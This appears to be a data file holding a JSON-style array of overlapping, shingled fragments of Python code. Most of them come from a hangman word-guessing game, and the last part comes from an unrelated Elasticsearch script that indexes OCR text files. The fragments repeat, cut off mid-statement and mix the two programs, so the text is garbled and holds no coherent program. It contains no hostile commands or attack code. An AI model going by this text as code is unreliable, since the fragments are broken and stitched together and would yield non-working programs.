[ "1)] playing = True tries = 5 return [words, output,", "check_letter(letter, word, tries): correct = False for index, letter in", "{0} tries left.\".format(tries)) # print(\"DEBUG: word is {0}\".format(word)) if output", "[words, output, word, tries, playing] def check_finished(output, tries): if tries", "def check_finished(output, tries): if tries == 0: print(\"You ran out", "if letter == guess: output[index] = guess correct = True", "== guess: output[index] = guess correct = True if index", "= True tries = 5 return [words, output, word, tries,", "guess = str(input(\"Guess: \")) if len(guess) == 1: break except", "\"peach\", \"grape\", \"watermelon\"] output = [] word = words[random.randint(0, len(words)", "output, word, tries, playing] def check_finished(output, tries): if tries ==", "break print() guess = check_same(guess, output) tries = check_letter(guess, word,", "random def setup(): words = [\"banana\", \"apple\", \"orange\", \"peach\", \"grape\",", "tries == 1: print(\"You have {0} try left.\".format(tries)) else: print(\"You", "\"watermelon\"] output = [] word = words[random.randint(0, len(words) - 1)]", "print(\"You have {0} try left.\".format(tries)) else: print(\"You have {0} tries", "print_output(output) print() print() return True return False def check_letter(letter, word,", "len(output): print_output(output) print() print() return True return False def check_letter(letter,", "found that letter\") print() print_output(output) print() print() while True: guess", "if index == len(word) - 1: if not correct: print(\"Incorrect", "not correct: print(\"Incorrect guess\") print() return tries - 1 else:", "print_output(output) print() print() try: while True: guess = str(input(\"Guess: \"))", "== len(word) - 1: if not correct: print(\"Incorrect guess\") print()", "tries): choice = input(\"Do you want to play again ?", "if len(guess) == 1: break except (EOFError, KeyboardInterrupt): print() break", "letter != \"_\": count += 1 if count == len(output):", "output: if i == guess: same = True if same:", "n): \") print() if choice.lower().startswith(\"y\"): words, output, word, tries, playing", "print(\"_ \", end=\"\") else: print_output(output) print() print() try: while True:", "== \"__main__\": words, output, word, tries, playing = setup() while", "- 1: if not correct: print(\"Incorrect guess\") print() return tries", "check_same(guess, output): same = False for i in output: if", "word, tries, playing] def check_finished(output, tries): if tries == 0:", "return tries - 1 else: return tries def check_same(guess, output):", "else: print_output(output) print() print() try: while True: guess = str(input(\"Guess:", "return False def check_letter(letter, word, tries): correct = False for", "tries - 1 else: return tries def check_same(guess, output): same", "- 1 else: return tries def check_same(guess, output): same =", "guess else: return guess def print_output(output): for i in output:", "== guess: same = True if same: print(\"You already found", "want to play again ? (y or n): \") print()", "word, tries, playing = setup() while playing: print(\"Try to guess", "print() break except ValueError: print(\"Invalid guess\") break print() guess =", "if not correct: print(\"Incorrect guess\") print() return tries - 1", "= False for i in output: if i == guess:", "len(guess) == 1: break return guess else: return guess def", "already found that letter\") print() print_output(output) print() print() while True:", "enumerate(word): if letter == guess: output[index] = guess correct =", "again ? (y or n): \") print() if choice.lower().startswith(\"y\"): words,", "word:\") if tries == 1: print(\"You have {0} try left.\".format(tries))", "print() print() while True: guess = str(input(\"Guess: \")) if len(guess)", "print() return True count = 0 for letter in output:", "return True return False def check_letter(letter, word, tries): correct =", "= 5 return [words, output, word, tries, playing] def check_finished(output,", "[\"banana\", \"apple\", \"orange\", \"peach\", \"grape\", \"watermelon\"] output = [] word", "!= \"_\": count += 1 if count == len(output): print_output(output)", "print() print_output(output) print() print() while True: guess = str(input(\"Guess: \"))", "guess = str(input(\"Guess: \")) if len(guess) == 1: break return", "import random def setup(): words = [\"banana\", \"apple\", \"orange\", \"peach\",", "= setup() while playing: print(\"Try to guess the word:\") if", "index, letter in enumerate(word): if letter == guess: output[index] =", "print(\"Incorrect guess\") print() return tries - 1 else: return tries", "== []: for i in word: output.append(\"_\") for i in", "[]: for i in word: output.append(\"_\") for i in range(len(output)):", "i in range(len(output)): print(\"_ \", end=\"\") else: print_output(output) print() print()", "except (EOFError, KeyboardInterrupt): print() break except ValueError: print(\"Invalid guess\") break", "i in output: if i == guess: same = True", "/home/cha0snation/anaconda3/bin/python import random def setup(): words = [\"banana\", \"apple\", \"orange\",", "== 1: break return guess else: return guess def print_output(output):", "while playing: print(\"Try to guess the word:\") if tries ==", "output == []: for i in word: output.append(\"_\") for i", "correct = False for index, letter in enumerate(word): if letter", "= True if same: print(\"You already found that letter\") print()", "def check_letter(letter, word, tries): correct = False for index, letter", "that letter\") print() print_output(output) print() print() while True: guess =", "guess: output[index] = guess correct = True if index ==", "letter in output: if letter != \"_\": count += 1", "correct = True if index == len(word) - 1: if", "== len(output): print_output(output) print() print() return True return False def", "tries): correct = False for index, letter in enumerate(word): if", "{0}\".format(word)) if output == []: for i in word: output.append(\"_\")", "in range(len(output)): print(\"_ \", end=\"\") else: print_output(output) print() print() try:", "tries, playing = setup() while playing: print(\"Try to guess the", "print() print() return True return False def check_letter(letter, word, tries):", "print(\"You have {0} tries left.\".format(tries)) # print(\"DEBUG: word is {0}\".format(word))", "index == len(word) - 1: if not correct: print(\"Incorrect guess\")", "word is {0}\".format(word)) if output == []: for i in", "def check_same(guess, output): same = False for i in output:", "range(len(output)): print(\"_ \", end=\"\") else: print_output(output) print() print() try: while", "guess\") print() return tries - 1 else: return tries def", "return tries def check_same(guess, output): same = False for i", "\".format(i), end=\"\") if __name__ == \"__main__\": words, output, word, tries,", "have {0} tries left.\".format(tries)) # print(\"DEBUG: word is {0}\".format(word)) if", "for i in word: output.append(\"_\") for i in range(len(output)): print(\"_", "+= 1 if count == len(output): print_output(output) print() print() return", "True tries = 5 return [words, output, word, tries, playing]", "return guess else: return guess def print_output(output): for i in", "left.\".format(tries)) else: print(\"You have {0} tries left.\".format(tries)) # print(\"DEBUG: word", "end=\"\") else: print_output(output) print() print() try: while True: guess =", "guess\") break print() guess = check_same(guess, output) tries = check_letter(guess,", "str(input(\"Guess: \")) if len(guess) == 1: break return guess else:", "1: print(\"You have {0} try left.\".format(tries)) else: print(\"You have {0}", "# print(\"DEBUG: word is {0}\".format(word)) if output == []: for", "words = [\"banana\", \"apple\", \"orange\", \"peach\", \"grape\", \"watermelon\"] output =", "output, word, tries, playing = setup() while playing: print(\"Try to", "if i == guess: same = True if same: print(\"You", "print(\"You ran out of tries\") print() return True count =", "= input(\"Do you want to play again ? (y or", "guess correct = True if index == len(word) - 1:", "playing = True tries = 5 return [words, output, word,", "return True count = 0 for letter in output: if", "you want to play again ? (y or n): \")", "len(words) - 1)] playing = True tries = 5 return", "tries = 5 return [words, output, word, tries, playing] def", "= str(input(\"Guess: \")) if len(guess) == 1: break return guess", "break except ValueError: print(\"Invalid guess\") break print() guess = check_same(guess,", "0: print(\"You ran out of tries\") print() return True count", "if len(guess) == 1: break return guess else: return guess", "print(\"You already found that letter\") print() print_output(output) print() print() while", "= guess correct = True if index == len(word) -", "guess the word:\") if tries == 1: print(\"You have {0}", "to play again ? (y or n): \") print() if", "output[index] = guess correct = True if index == len(word)", "in enumerate(word): if letter == guess: output[index] = guess correct", "letter == guess: output[index] = guess correct = True if", "\", end=\"\") else: print_output(output) print() print() try: while True: guess", "\")) if len(guess) == 1: break except (EOFError, KeyboardInterrupt): print()", "letter in enumerate(word): if letter == guess: output[index] = guess", "len(guess) == 1: break except (EOFError, KeyboardInterrupt): print() break except", "tries\") print() return True count = 0 for letter in", "same = False for i in output: if i ==", "check_finished(output, tries): choice = input(\"Do you want to play again", "print() while True: guess = str(input(\"Guess: \")) if len(guess) ==", "letter\") print() print_output(output) print() print() while True: guess = str(input(\"Guess:", "else: print(\"You have {0} tries left.\".format(tries)) # print(\"DEBUG: word is", "tries, playing] def check_finished(output, tries): if tries == 0: print(\"You", "print() guess = check_same(guess, output) tries = check_letter(guess, word, tries)", "or n): \") print() if choice.lower().startswith(\"y\"): words, output, word, tries,", "= 0 for letter in output: if letter != \"_\":", "guess: same = True if same: print(\"You already found that", "print() try: while True: guess = str(input(\"Guess: \")) if len(guess)", "True return False def check_letter(letter, word, tries): correct = False", "print_output(output) print() print() while True: guess = str(input(\"Guess: \")) if", "if choice.lower().startswith(\"y\"): words, output, word, tries, playing = setup() else:", "\"__main__\": words, output, word, tries, playing = setup() while playing:", "\") print() if choice.lower().startswith(\"y\"): words, output, word, tries, playing =", "0 for letter in output: if letter != \"_\": count", "else: return tries def check_same(guess, output): same = False for", "True count = 0 for letter in output: if letter", "def print_output(output): for i in output: print(\"{0} \".format(i), end=\"\") if", "print(\"Try to guess the word:\") if tries == 1: print(\"You", "try: while True: guess = str(input(\"Guess: \")) if len(guess) ==", "\"orange\", \"peach\", \"grape\", \"watermelon\"] output = [] word = words[random.randint(0,", "playing] def check_finished(output, tries): if tries == 0: print(\"You ran", "True: guess = str(input(\"Guess: \")) if len(guess) == 1: break", "have {0} try left.\".format(tries)) else: print(\"You have {0} tries left.\".format(tries))", "for letter in output: if letter != \"_\": count +=", "count += 1 if count == len(output): print_output(output) print() print()", "in word: output.append(\"_\") for i in range(len(output)): print(\"_ \", end=\"\")", "False for index, letter in enumerate(word): if letter == guess:", "str(input(\"Guess: \")) if len(guess) == 1: break except (EOFError, KeyboardInterrupt):", "words, output, word, tries, playing = setup() while playing: print(\"Try", "== 1: print(\"You have {0} try left.\".format(tries)) else: print(\"You have", "word, tries): correct = False for index, letter in enumerate(word):", "setup(): words = [\"banana\", \"apple\", \"orange\", \"peach\", \"grape\", \"watermelon\"] output", "i == guess: same = True if same: print(\"You already", "== 0: print(\"You ran out of tries\") print() return True", "tries) if check_finished(output, tries): choice = input(\"Do you want to", "end=\"\") if __name__ == \"__main__\": words, output, word, tries, playing", "check_same(guess, output) tries = check_letter(guess, word, tries) if check_finished(output, tries):", "- 1)] playing = True tries = 5 return [words,", "print_output(output): for i in output: print(\"{0} \".format(i), end=\"\") if __name__", "if tries == 1: print(\"You have {0} try left.\".format(tries)) else:", "False for i in output: if i == guess: same", "if same: print(\"You already found that letter\") print() print_output(output) print()", "if output == []: for i in word: output.append(\"_\") for", "if letter != \"_\": count += 1 if count ==", "(EOFError, KeyboardInterrupt): print() break except ValueError: print(\"Invalid guess\") break print()", "for i in output: print(\"{0} \".format(i), end=\"\") if __name__ ==", "else: return guess def print_output(output): for i in output: print(\"{0}", "word = words[random.randint(0, len(words) - 1)] playing = True tries", "in output: if i == guess: same = True if", "output.append(\"_\") for i in range(len(output)): print(\"_ \", end=\"\") else: print_output(output)", "check_finished(output, tries): if tries == 0: print(\"You ran out of", "= check_same(guess, output) tries = check_letter(guess, word, tries) if check_finished(output,", "output: if letter != \"_\": count += 1 if count", "output) tries = check_letter(guess, word, tries) if check_finished(output, tries): choice", "len(word) - 1: if not correct: print(\"Incorrect guess\") print() return", "print(\"DEBUG: word is {0}\".format(word)) if output == []: for i", "play again ? (y or n): \") print() if choice.lower().startswith(\"y\"):", "count = 0 for letter in output: if letter !=", "1 if count == len(output): print_output(output) print() print() return True", "\"grape\", \"watermelon\"] output = [] word = words[random.randint(0, len(words) -", "same: print(\"You already found that letter\") print() print_output(output) print() print()", "tries def check_same(guess, output): same = False for i in", "setup() while playing: print(\"Try to guess the word:\") if tries", "count == len(output): print_output(output) print() print() return True return False", "False def check_letter(letter, word, tries): correct = False for index,", "return [words, output, word, tries, playing] def check_finished(output, tries): if", "5 return [words, output, word, tries, playing] def check_finished(output, tries):", "KeyboardInterrupt): print() break except ValueError: print(\"Invalid guess\") break print() guess", "1: break except (EOFError, KeyboardInterrupt): print() break except ValueError: print(\"Invalid", "out of tries\") print() return True count = 0 for", "tries = check_letter(guess, word, tries) if check_finished(output, tries): choice =", "for index, letter in enumerate(word): if letter == guess: output[index]", "playing = setup() while playing: print(\"Try to guess the word:\")", "? (y or n): \") print() if choice.lower().startswith(\"y\"): words, output,", "words, output, word, tries, playing = setup() else: playing =", "\"apple\", \"orange\", \"peach\", \"grape\", \"watermelon\"] output = [] word =", "try left.\".format(tries)) else: print(\"You have {0} tries left.\".format(tries)) # print(\"DEBUG:", "tries left.\".format(tries)) # print(\"DEBUG: word is {0}\".format(word)) if output ==", "same = True if same: print(\"You already found that letter\")", "guess def print_output(output): for i in output: print(\"{0} \".format(i), end=\"\")", "guess = check_same(guess, output) tries = check_letter(guess, word, tries) if", "= words[random.randint(0, len(words) - 1)] playing = True tries =", "True if index == len(word) - 1: if not correct:", "if __name__ == \"__main__\": words, output, word, tries, playing =", "= check_letter(guess, word, tries) if check_finished(output, tries): choice = input(\"Do", "output = [] word = words[random.randint(0, len(words) - 1)] playing", "= str(input(\"Guess: \")) if len(guess) == 1: break except (EOFError,", "input(\"Do you want to play again ? (y or n):", "if count == len(output): print_output(output) print() print() return True return", "tries): if tries == 0: print(\"You ran out of tries\")", "print() print() try: while True: guess = str(input(\"Guess: \")) if", "1: break return guess else: return guess def print_output(output): for", "words[random.randint(0, len(words) - 1)] playing = True tries = 5", "of tries\") print() return True count = 0 for letter", "= True if index == len(word) - 1: if not", "the word:\") if tries == 1: print(\"You have {0} try", "output, word, tries, playing = setup() else: playing = False", "in output: if letter != \"_\": count += 1 if", "1 else: return tries def check_same(guess, output): same = False", "left.\".format(tries)) # print(\"DEBUG: word is {0}\".format(word)) if output == []:", "for i in range(len(output)): print(\"_ \", end=\"\") else: print_output(output) print()", "ran out of tries\") print() return True count = 0", "to guess the word:\") if tries == 1: print(\"You have", "except ValueError: print(\"Invalid guess\") break print() guess = check_same(guess, output)", "return guess def print_output(output): for i in output: print(\"{0} \".format(i),", "(y or n): \") print() if choice.lower().startswith(\"y\"): words, output, word,", "output: print(\"{0} \".format(i), end=\"\") if __name__ == \"__main__\": words, output,", "check_letter(guess, word, tries) if check_finished(output, tries): choice = input(\"Do you", "[] word = words[random.randint(0, len(words) - 1)] playing = True", "choice.lower().startswith(\"y\"): words, output, word, tries, playing = setup() else: playing", "if tries == 0: print(\"You ran out of tries\") print()", "while True: guess = str(input(\"Guess: \")) if len(guess) == 1:", "if check_finished(output, tries): choice = input(\"Do you want to play", "ValueError: print(\"Invalid guess\") break print() guess = check_same(guess, output) tries", "= [\"banana\", \"apple\", \"orange\", \"peach\", \"grape\", \"watermelon\"] output = []", "for i in output: if i == guess: same =", "choice = input(\"Do you want to play again ? (y", "{0} try left.\".format(tries)) else: print(\"You have {0} tries left.\".format(tries)) #", "word, tries) if check_finished(output, tries): choice = input(\"Do you want", "\")) if len(guess) == 1: break return guess else: return", "print() return tries - 1 else: return tries def check_same(guess,", "== 1: break except (EOFError, KeyboardInterrupt): print() break except ValueError:", "print() return True return False def check_letter(letter, word, tries): correct", "i in output: print(\"{0} \".format(i), end=\"\") if __name__ == \"__main__\":", "in output: print(\"{0} \".format(i), end=\"\") if __name__ == \"__main__\": words,", "is {0}\".format(word)) if output == []: for i in word:", "break return guess else: return guess def print_output(output): for i", "def setup(): words = [\"banana\", \"apple\", \"orange\", \"peach\", \"grape\", \"watermelon\"]", "tries == 0: print(\"You ran out of tries\") print() return", "output): same = False for i in output: if i", "playing: print(\"Try to guess the word:\") if tries == 1:", "correct: print(\"Incorrect guess\") print() return tries - 1 else: return", "break except (EOFError, KeyboardInterrupt): print() break except ValueError: print(\"Invalid guess\")", "\"_\": count += 1 if count == len(output): print_output(output) print()", "__name__ == \"__main__\": words, output, word, tries, playing = setup()", "print(\"Invalid guess\") break print() guess = check_same(guess, output) tries =", "True if same: print(\"You already found that letter\") print() print_output(output)", "print() if choice.lower().startswith(\"y\"): words, output, word, tries, playing = setup()", "= [] word = words[random.randint(0, len(words) - 1)] playing =", "i in word: output.append(\"_\") for i in range(len(output)): print(\"_ \",", "word: output.append(\"_\") for i in range(len(output)): print(\"_ \", end=\"\") else:", "1: if not correct: print(\"Incorrect guess\") print() return tries -", "= False for index, letter in enumerate(word): if letter ==", "#! /home/cha0snation/anaconda3/bin/python import random def setup(): words = [\"banana\", \"apple\",", "print(\"{0} \".format(i), end=\"\") if __name__ == \"__main__\": words, output, word," ]
[ "create ES client, create index es = Elasticsearch(hosts = [ES_HOST])", "txts_path = '%s/artdatis/tagging/OCRed/typed/' % DATA_PATH text_corpus = [] def corpus_iterator():", "out and collect text files for file_path in glob.glob(txts_path+'*_text.txt'): with", "\"text\": text, \"start_text\": start_text}, } print(\"Loaded %d documents\"%len(text_corpus)) from elasticsearch", "if es.indices.exists(INDEX_NAME): print(\"deleting '%s' index...\" % (INDEX_NAME)) res = es.indices.delete(index", "first characters for the doc preview LIMIT_START = 100 txts_path", "client, create index es = Elasticsearch(hosts = [ES_HOST]) if es.indices.exists(INDEX_NAME):", "size=2, body={\"query\": {\"match_all\": {}}}) print(\"results:\") for hit in res['hits']['hits']: print(hit[\"_source\"])", "data print(\"bulk indexing...\") bulk(es, corpus_iterator()) # sanity check res =", "text_corpus = [] def corpus_iterator(): # filter out and collect", "ES client, create index es = Elasticsearch(hosts = [ES_HOST]) if", "\"_type\": TYPE_NAME, \"_source\": {\"file_path\": path, \"text\": text, \"start_text\": start_text}, }", "\"_source\": {\"file_path\": path, \"text\": text, \"start_text\": start_text}, } print(\"Loaded %d", "= 100 txts_path = '%s/artdatis/tagging/OCRed/typed/' % DATA_PATH text_corpus = []", "def corpus_iterator(): # filter out and collect text files for", "', text) start_text = text.lstrip()[:LIMIT_START] with open(file_path.split('_text.txt')[0]+'_path.txt') as path_file: path", "text_corpus: text_corpus.append(text) text = re.sub(' +', ' ', text) start_text", "es.indices.create(index = INDEX_NAME, body = request_body) print(\" response: '%s'\" %", "files for file_path in glob.glob(txts_path+'*_text.txt'): with open(file_path, encoding=\"utf-8\") as file:", "with open(file_path, encoding=\"utf-8\") as file: text = file.read() # filter", "= [ES_HOST]) if es.indices.exists(INDEX_NAME): print(\"deleting '%s' index...\" % (INDEX_NAME)) res", "8, 2019 .. codeauthor: <NAME> <<EMAIL>> Index docs into ES", "elasticsearch import Elasticsearch from elasticsearch.helpers import bulk # create ES", "elasticsearch.helpers import bulk # create ES client, create index es", "= '%s/artdatis/tagging/OCRed/typed/' % DATA_PATH text_corpus = [] def corpus_iterator(): #", "open(file_path, encoding=\"utf-8\") as file: text = file.read() # filter duplicates", "res = es.indices.create(index = INDEX_NAME, body = request_body) print(\" response:", "request_body) print(\" response: '%s'\" % (res)) # bulk index the", "''' Created on Dec 8, 2019 .. codeauthor: <NAME> <<EMAIL>>", "index the data print(\"bulk indexing...\") bulk(es, corpus_iterator()) # sanity check", "docs into ES https://qbox.io/blog/building-an-elasticsearch-index-with-python ''' from settings import * import", "https://qbox.io/blog/building-an-elasticsearch-index-with-python ''' from settings import * import glob import re", "text_corpus.append(text) text = re.sub(' +', ' ', text) start_text =", "index...\" % (INDEX_NAME)) res = es.indices.delete(index = INDEX_NAME) print(\" response:", "text not in text_corpus: text_corpus.append(text) text = re.sub(' +', '", "= { \"settings\" : { \"number_of_shards\": 1, \"number_of_replicas\": 0 }", "print(\"Loaded %d documents\"%len(text_corpus)) from elasticsearch import Elasticsearch from elasticsearch.helpers import", "es.indices.exists(INDEX_NAME): print(\"deleting '%s' index...\" % (INDEX_NAME)) res = es.indices.delete(index =", "for file_path in glob.glob(txts_path+'*_text.txt'): with open(file_path, encoding=\"utf-8\") as file: text", "request_body = { \"settings\" : { \"number_of_shards\": 1, \"number_of_replicas\": 0", "from settings import * import glob import re # n", "} print(\"Loaded %d documents\"%len(text_corpus)) from elasticsearch import Elasticsearch from elasticsearch.helpers", "bulk # create ES client, create index es = Elasticsearch(hosts", "(res)) # bulk index the data print(\"bulk indexing...\") bulk(es, corpus_iterator())", "print(\" response: '%s'\" % (res)) # bulk index the data", "import * import glob import re # n first characters", "res = es.indices.delete(index = INDEX_NAME) print(\" response: '%s'\" % (res))", "#!/usr/bin/env python # -*- coding: utf-8 -*- ''' Created on", "%d documents\"%len(text_corpus)) from elasticsearch import Elasticsearch from elasticsearch.helpers import bulk", "characters for the doc preview LIMIT_START = 100 txts_path =", "Elasticsearch(hosts = [ES_HOST]) if es.indices.exists(INDEX_NAME): print(\"deleting '%s' index...\" % (INDEX_NAME))", "text files for file_path in glob.glob(txts_path+'*_text.txt'): with open(file_path, encoding=\"utf-8\") as", "res = es.search(index = INDEX_NAME, size=2, body={\"query\": {\"match_all\": {}}}) print(\"results:\")", "start_text}, } print(\"Loaded %d documents\"%len(text_corpus)) from elasticsearch import Elasticsearch from", "= INDEX_NAME) print(\" response: '%s'\" % (res)) request_body = {", "<<EMAIL>> Index docs into ES https://qbox.io/blog/building-an-elasticsearch-index-with-python ''' from settings import", "'%s/artdatis/tagging/OCRed/typed/' % DATA_PATH text_corpus = [] def corpus_iterator(): # filter", "filter out and collect text files for file_path in glob.glob(txts_path+'*_text.txt'):", "INDEX_NAME) print(\" response: '%s'\" % (res)) request_body = { \"settings\"", "\"number_of_shards\": 1, \"number_of_replicas\": 0 } } print(\"creating '%s' index...\" %", "-*- coding: utf-8 -*- ''' Created on Dec 8, 2019", "% (INDEX_NAME)) res = es.indices.delete(index = INDEX_NAME) print(\" response: '%s'\"", "[ES_HOST]) if es.indices.exists(INDEX_NAME): print(\"deleting '%s' index...\" % (INDEX_NAME)) res =", "file_path in glob.glob(txts_path+'*_text.txt'): with open(file_path, encoding=\"utf-8\") as file: text =", "print(\"deleting '%s' index...\" % (INDEX_NAME)) res = es.indices.delete(index = INDEX_NAME)", "if text not in text_corpus: text_corpus.append(text) text = re.sub(' +',", "print(\"bulk indexing...\") bulk(es, corpus_iterator()) # sanity check res = es.search(index", "es.indices.delete(index = INDEX_NAME) print(\" response: '%s'\" % (res)) request_body =", "and collect text files for file_path in glob.glob(txts_path+'*_text.txt'): with open(file_path,", "'%s'\" % (res)) request_body = { \"settings\" : { \"number_of_shards\":", "as file: text = file.read() # filter duplicates if text", "(INDEX_NAME)) res = es.indices.create(index = INDEX_NAME, body = request_body) print(\"", "\"settings\" : { \"number_of_shards\": 1, \"number_of_replicas\": 0 } } print(\"creating", "# create ES client, create index es = Elasticsearch(hosts =", "glob import re # n first characters for the doc", "for the doc preview LIMIT_START = 100 txts_path = '%s/artdatis/tagging/OCRed/typed/'", "text) start_text = text.lstrip()[:LIMIT_START] with open(file_path.split('_text.txt')[0]+'_path.txt') as path_file: path =", "\"_index\": INDEX_NAME, \"_type\": TYPE_NAME, \"_source\": {\"file_path\": path, \"text\": text, \"start_text\":", "= es.indices.delete(index = INDEX_NAME) print(\" response: '%s'\" % (res)) request_body", "% (res)) request_body = { \"settings\" : { \"number_of_shards\": 1,", "# -*- coding: utf-8 -*- ''' Created on Dec 8,", "# filter duplicates if text not in text_corpus: text_corpus.append(text) text", "es = Elasticsearch(hosts = [ES_HOST]) if es.indices.exists(INDEX_NAME): print(\"deleting '%s' index...\"", "INDEX_NAME, body = request_body) print(\" response: '%s'\" % (res)) #", "LIMIT_START = 100 txts_path = '%s/artdatis/tagging/OCRed/typed/' % DATA_PATH text_corpus =", "yield { \"_index\": INDEX_NAME, \"_type\": TYPE_NAME, \"_source\": {\"file_path\": path, \"text\":", "coding: utf-8 -*- ''' Created on Dec 8, 2019 ..", "} } print(\"creating '%s' index...\" % (INDEX_NAME)) res = es.indices.create(index", "ES https://qbox.io/blog/building-an-elasticsearch-index-with-python ''' from settings import * import glob import", "re.sub(' +', ' ', text) start_text = text.lstrip()[:LIMIT_START] with open(file_path.split('_text.txt')[0]+'_path.txt')", "# n first characters for the doc preview LIMIT_START =", "# bulk index the data print(\"bulk indexing...\") bulk(es, corpus_iterator()) #", "utf-8 -*- ''' Created on Dec 8, 2019 .. codeauthor:", "from elasticsearch import Elasticsearch from elasticsearch.helpers import bulk # create", "open(file_path.split('_text.txt')[0]+'_path.txt') as path_file: path = path_file.read().strip().replace(DATA_PATH, '/images') yield { \"_index\":", "% (res)) # bulk index the data print(\"bulk indexing...\") bulk(es,", "doc preview LIMIT_START = 100 txts_path = '%s/artdatis/tagging/OCRed/typed/' % DATA_PATH", "path_file.read().strip().replace(DATA_PATH, '/images') yield { \"_index\": INDEX_NAME, \"_type\": TYPE_NAME, \"_source\": {\"file_path\":", "body = request_body) print(\" response: '%s'\" % (res)) # bulk", "'%s'\" % (res)) # bulk index the data print(\"bulk indexing...\")", "= text.lstrip()[:LIMIT_START] with open(file_path.split('_text.txt')[0]+'_path.txt') as path_file: path = path_file.read().strip().replace(DATA_PATH, '/images')", "Elasticsearch from elasticsearch.helpers import bulk # create ES client, create", "collect text files for file_path in glob.glob(txts_path+'*_text.txt'): with open(file_path, encoding=\"utf-8\")", "codeauthor: <NAME> <<EMAIL>> Index docs into ES https://qbox.io/blog/building-an-elasticsearch-index-with-python ''' from", "INDEX_NAME, \"_type\": TYPE_NAME, \"_source\": {\"file_path\": path, \"text\": text, \"start_text\": start_text},", ": { \"number_of_shards\": 1, \"number_of_replicas\": 0 } } print(\"creating '%s'", "corpus_iterator(): # filter out and collect text files for file_path", "filter duplicates if text not in text_corpus: text_corpus.append(text) text =", "sanity check res = es.search(index = INDEX_NAME, size=2, body={\"query\": {\"match_all\":", "2019 .. codeauthor: <NAME> <<EMAIL>> Index docs into ES https://qbox.io/blog/building-an-elasticsearch-index-with-python", "* import glob import re # n first characters for", "[] def corpus_iterator(): # filter out and collect text files", "+', ' ', text) start_text = text.lstrip()[:LIMIT_START] with open(file_path.split('_text.txt')[0]+'_path.txt') as", "n first characters for the doc preview LIMIT_START = 100", "-*- ''' Created on Dec 8, 2019 .. codeauthor: <NAME>", "path = path_file.read().strip().replace(DATA_PATH, '/images') yield { \"_index\": INDEX_NAME, \"_type\": TYPE_NAME,", "from elasticsearch.helpers import bulk # create ES client, create index", "indexing...\") bulk(es, corpus_iterator()) # sanity check res = es.search(index =", "text = file.read() # filter duplicates if text not in", "import glob import re # n first characters for the", "{ \"number_of_shards\": 1, \"number_of_replicas\": 0 } } print(\"creating '%s' index...\"", "in glob.glob(txts_path+'*_text.txt'): with open(file_path, encoding=\"utf-8\") as file: text = file.read()", "in text_corpus: text_corpus.append(text) text = re.sub(' +', ' ', text)", "= re.sub(' +', ' ', text) start_text = text.lstrip()[:LIMIT_START] with", "# sanity check res = es.search(index = INDEX_NAME, size=2, body={\"query\":", "settings import * import glob import re # n first", "text = re.sub(' +', ' ', text) start_text = text.lstrip()[:LIMIT_START]", "' ', text) start_text = text.lstrip()[:LIMIT_START] with open(file_path.split('_text.txt')[0]+'_path.txt') as path_file:", "= file.read() # filter duplicates if text not in text_corpus:", "import bulk # create ES client, create index es =", "es.search(index = INDEX_NAME, size=2, body={\"query\": {\"match_all\": {}}}) print(\"results:\") for hit", "1, \"number_of_replicas\": 0 } } print(\"creating '%s' index...\" % (INDEX_NAME))", "= request_body) print(\" response: '%s'\" % (res)) # bulk index", "preview LIMIT_START = 100 txts_path = '%s/artdatis/tagging/OCRed/typed/' % DATA_PATH text_corpus", "{ \"_index\": INDEX_NAME, \"_type\": TYPE_NAME, \"_source\": {\"file_path\": path, \"text\": text,", "glob.glob(txts_path+'*_text.txt'): with open(file_path, encoding=\"utf-8\") as file: text = file.read() #", "index es = Elasticsearch(hosts = [ES_HOST]) if es.indices.exists(INDEX_NAME): print(\"deleting '%s'", "as path_file: path = path_file.read().strip().replace(DATA_PATH, '/images') yield { \"_index\": INDEX_NAME,", "% DATA_PATH text_corpus = [] def corpus_iterator(): # filter out", "0 } } print(\"creating '%s' index...\" % (INDEX_NAME)) res =", "= es.search(index = INDEX_NAME, size=2, body={\"query\": {\"match_all\": {}}}) print(\"results:\") for", "into ES https://qbox.io/blog/building-an-elasticsearch-index-with-python ''' from settings import * import glob", "% (INDEX_NAME)) res = es.indices.create(index = INDEX_NAME, body = request_body)", "= path_file.read().strip().replace(DATA_PATH, '/images') yield { \"_index\": INDEX_NAME, \"_type\": TYPE_NAME, \"_source\":", "index...\" % (INDEX_NAME)) res = es.indices.create(index = INDEX_NAME, body =", "= [] def corpus_iterator(): # filter out and collect text", "import Elasticsearch from elasticsearch.helpers import bulk # create ES client,", "TYPE_NAME, \"_source\": {\"file_path\": path, \"text\": text, \"start_text\": start_text}, } print(\"Loaded", "bulk(es, corpus_iterator()) # sanity check res = es.search(index = INDEX_NAME,", "file.read() # filter duplicates if text not in text_corpus: text_corpus.append(text)", "DATA_PATH text_corpus = [] def corpus_iterator(): # filter out and", "corpus_iterator()) # sanity check res = es.search(index = INDEX_NAME, size=2,", "= INDEX_NAME, body = request_body) print(\" response: '%s'\" % (res))", "{\"file_path\": path, \"text\": text, \"start_text\": start_text}, } print(\"Loaded %d documents\"%len(text_corpus))", "<NAME> <<EMAIL>> Index docs into ES https://qbox.io/blog/building-an-elasticsearch-index-with-python ''' from settings", "} print(\"creating '%s' index...\" % (INDEX_NAME)) res = es.indices.create(index =", "(INDEX_NAME)) res = es.indices.delete(index = INDEX_NAME) print(\" response: '%s'\" %", "bulk index the data print(\"bulk indexing...\") bulk(es, corpus_iterator()) # sanity", "path_file: path = path_file.read().strip().replace(DATA_PATH, '/images') yield { \"_index\": INDEX_NAME, \"_type\":", "text.lstrip()[:LIMIT_START] with open(file_path.split('_text.txt')[0]+'_path.txt') as path_file: path = path_file.read().strip().replace(DATA_PATH, '/images') yield", "# filter out and collect text files for file_path in", "python # -*- coding: utf-8 -*- ''' Created on Dec", "{ \"settings\" : { \"number_of_shards\": 1, \"number_of_replicas\": 0 } }", ".. codeauthor: <NAME> <<EMAIL>> Index docs into ES https://qbox.io/blog/building-an-elasticsearch-index-with-python '''", "Created on Dec 8, 2019 .. codeauthor: <NAME> <<EMAIL>> Index", "print(\" response: '%s'\" % (res)) request_body = { \"settings\" :", "= Elasticsearch(hosts = [ES_HOST]) if es.indices.exists(INDEX_NAME): print(\"deleting '%s' index...\" %", "with open(file_path.split('_text.txt')[0]+'_path.txt') as path_file: path = path_file.read().strip().replace(DATA_PATH, '/images') yield {", "'/images') yield { \"_index\": INDEX_NAME, \"_type\": TYPE_NAME, \"_source\": {\"file_path\": path,", "\"start_text\": start_text}, } print(\"Loaded %d documents\"%len(text_corpus)) from elasticsearch import Elasticsearch", "''' from settings import * import glob import re #", "not in text_corpus: text_corpus.append(text) text = re.sub(' +', ' ',", "100 txts_path = '%s/artdatis/tagging/OCRed/typed/' % 